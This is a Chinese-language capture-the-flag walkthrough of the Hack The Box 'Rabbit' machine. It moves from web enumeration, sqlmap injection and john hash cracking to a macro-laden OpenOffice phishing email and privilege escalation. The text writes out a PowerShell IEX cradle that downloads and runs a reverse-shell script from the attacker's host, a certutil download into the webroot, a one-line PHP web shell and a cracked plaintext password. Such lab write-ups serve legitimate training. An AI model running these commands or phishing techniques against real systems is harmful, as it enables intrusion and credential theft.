Skip to content

Latest commit

 

History

History
333 lines (173 loc) · 16.4 KB

HackTheBox-windows-Rabbit.md

File metadata and controls

333 lines (173 loc) · 16.4 KB
Raw

本文由 简悦 SimpRead 转码, 原文地址 mp.weixin.qq.com

大余安全  

一个每日分享渗透小技巧的公众号

大家好,这里是 大余安全 的第 73 篇文章,本公众号会每日分享攻防渗透技术给大家。

靶机地址:https://www.hackthebox.eu/home/machines/profile/133

靶机难度:初级(3.7/10)

靶机发布日期:2018 年 10 月 25 日

靶机描述:

Rabbit is a fairly realistic machine which provides excellent practice for client-side attacks and web app enumeration. The large potential attack surface of the machine and lack of feedback for created payloads increases the difficulty of the machine.

请注意:对于所有这些计算机,我是通过平台授权允许情况进行渗透的。我将使用 Kali Linux 作为解决该 HTB 的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。

一、信息收集

可以看到靶机的 IP 是 10.10.10.71....

可以看到 Nmap 扫描发现了很多信息... 服务器的 FQDN,DNS,Netbios 名称等

可以看到已安装了 Active Directory 域服务,Microsoft Exchange 和 IIS,以及其它很多感兴趣的端口(例如 8080)...

先从 web 开始下手吧...

gobuster dir -u http://10.10.10.71:8080 -w directory-list-2.3-small.txt -t 10

爆破目录发现了 complain,然后在里面发现了访问登陆的页面...

在 complain 目录下的 php 找到了投诉管理的登录界面...

这里应该是存在 sql 注入的...

先查看有什么漏洞可以利用...

可以看到,只需要注册用户,然后通过 phpsession+sqlmap+cookie 即可提权... 试试

创建成功...

这里成功通过创建的账号密码登陆...

可以看到利用 42968 exploit 里的注入代码,测试是存在 sql 注入的...

这里直接利用 burpsuit 抓后台数据,将 phpsession 和 cookie 等信息保存...

保存即可...

sqlmap -r dayu.req --technique=U --dbms mysql --dump

利用 sqlmap 注入攻击... 可以看到我刚注册过的账号等信息,以及办公区域的信息... 但是没有啥用...

利用 --dbs 发现有数据库等信息内容,我这边一个一个找...

sqlmap -r dayu.req --technique=U --dbms mysql -D secret --dump

这里我利用了默认文本密码进行注入...

可以,在 secret 发现了用户密码信息...

将信息保存出来...

john --format=Raw-MD5 --wordlist=/usr/share/wordlists/rockyou.txt userpasswd.txt

可以看到利用开膛手破解成功...

这里我利用账号密码登陆没发现什么有用的信息... 我转到了 443 上进行继续爆破...

gobuster dir -k -u https://10.10.10.71 -w directory-list-2.3-small.txt  -o gobuster443.txt

继续爆破目录...

https://10.10.10.71/public

访问 public 后重定向到了 Outlook web app...

利用 john 爆破的 Ariel:pussycatdolls 成功登陆...

进来可以看到三封邮件.. 这里可以通过恶意钓鱼邮件进行提权...

第二封邮件也提醒了,这边利用 powershell 发送邮件提权...

二、提权

方法 1:

这里开始自行写一个钓鱼邮件...GOGOGO

google 搜索 openoffice_document_macro.rb

搜索 Getos,利用这里的源代码即可...

然后 apt-get install openoffice 下载这个工具,800 多 MB 但是需要写恶意程序都需要它,非常好的东西... 下载完打开 openoffice write

跟着箭头走!!!

可以看到已经创建好了一个钓鱼的恶意文件的架构!!!

然后将前面 openoffice_document_macro.rb 搜索的 Getos 那段内容复制进来即可...

搜索 WINDOWSGUI 可以看到前面有编译了,按照它的编译修改下...

改好后,下一步就是查找 exploi...

这里按照搜索 get_statger... 继续查找 windows 的 shell

继续搜索 windows_stager,可以发现 shell 利用即可...

写入利用 certutil 进行上传 nc.exe 进行提权... 这里本地要下载好 nc.exe,打开 80 服务,nc 开启 443 即可...

左上角保存或者 ctrl+s 即可.. 保存在自己目录下...

好了,这里已经写好了一个钓鱼邮件的恶意程序,开始发送

上传后等待即可提权...

解释:为了逃避防病毒程序的检测,所以使用 Shell 来对合法的网络连接的二进制文件. exe、.asp1 等进行后门操作... 将宏内容压缩后,以. odt 扩展名重命名,并生成一个 Web 服务器来提供恶意的二进制文件...

方法 2:

利用 MSF 里的 openoffice 的 Exploit 进行生成 obt 文件...

这里填错了,我的本地 IP 是 10.10.14.5...

成功生成了钓鱼邮件的恶意程序...

放到本地后重命名为 zip 文件... 然后打开即可...

或者用 openoffice 进行打开,打开第一次会报错,记得修改这里....

用文本打开内容是这样的... 这里需要修改下 powershell 即可...

powershell.exe -version 2 IEX (New-Object System.Net.Webclient).DownloadString('http://10.10.14.5/dayushell.ps1');dayushell -c 10.10.14.5 -p 1234 -e cmd;

修改完后将 zip 改成 odt 即可...

这里点 send 发送即可...

成功获得低权用户 raziel 权限...

成功拿到 user.txt...

可以看到在其放一个反向 shell.php 即可提权...

<?php system($_GET["cmd"]);
certutil -urlcache -split -f http://10.10.14.5/shell1.php c:\wamp64\www\shell1.php
http://10.10.10.71:8080/dayuroot.php?cmd=whoami

可以看到成功获得 system 权限...

成功获得 root 信息...

由于我们已经成功得到 root 权限查看 user.txt 和 root.txt,因此完成了靶机,希望你们喜欢这台机器,请继续关注大余后期会有更多具有挑战性的机器,一起练习学习。

如果你有其他的方法,欢迎留言。要是有写错了的地方,请你一定要告诉我。要是你觉得这篇博客写的还不错,欢迎分享给身边的人。

如果觉得这篇文章对你有帮助,可以转发到朋友圈,谢谢小伙伴~

随缘收徒中~~ 随缘收徒中~~ 随缘收徒中~~

欢迎加入渗透学习交流群,想入群的小伙伴们加我微信,共同进步共同成长!

大余安全

一个全栈渗透小技巧的公众号